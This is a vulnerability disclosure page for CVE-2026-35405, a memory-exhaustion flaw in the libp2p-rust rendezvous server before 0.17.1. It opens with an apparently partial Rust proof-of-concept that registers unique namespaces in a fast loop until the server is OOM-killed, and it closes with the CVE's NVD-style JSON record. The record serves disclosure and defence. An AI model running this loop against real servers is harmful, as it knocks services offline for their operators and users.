CVE-2026-35405

// Conceptual PoC for CVE-2026-35405 // This code demonstrates the logic to exhaust server memory by registering unique namespaces. use libp2p::{rendezvous, Swarm}; use std::time::Duration; #[tokio::main] async fn main() { // ... (Swarm setup omitted for brevity) ... let mut swarm = /* ... */; loop { // Generate a unique namespace for each iteration let unique_namespace = format!("exploit_namespace_{}", uuid::Uuid::new_v4()); // Send registration request to the server // In a vulnerable server (< 0.17.1), this allocates memory without check match swarm.behaviour_mut().register( rendezvous::Namespace::new(unique_namespace.clone()).unwrap(), rendezvous::Peer::new(random_peer_id()) ) { Ok(_) => println!("Registered namespace: {}", unique_namespace), Err(e) => eprintln!("Registration failed: {:?}", e), } // Optional: Small delay to avoid immediate local network saturation, but keep it fast tokio::time::sleep(Duration::from_millis(10)).await; // The server will eventually OOM (Out Of Memory) and crash. } }

{"cve": {"id": "CVE-2026-35405", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:43.367", "lastModified": "2026-04-24T13:37:22.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libp2p-rust is the official rust language Implementation of the libp2p networking stack. Prior to 0.17.1, libp2p-rendezvous server has no limit on how many namespaces a single peer can register. A malicious peer can just keep registering unique namespaces in a loop and the server happily accepts every single one allocating memory for each registration with no pushback. Keep doing this long enough (or with multiple sybil peers) and the server process gets OOM killed. This vulnerability is fixed in 0.17.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:libp2p:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.17.1", "matchCriteriaId": "0EA2FB25-A1F1-4E02-A0C9-0BCC07AFCA5C"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-cqfx-gf56-8x59", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/libp2p/rust-libp2p/security/advisories/GHSA-cqfx-gf56-8x59", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}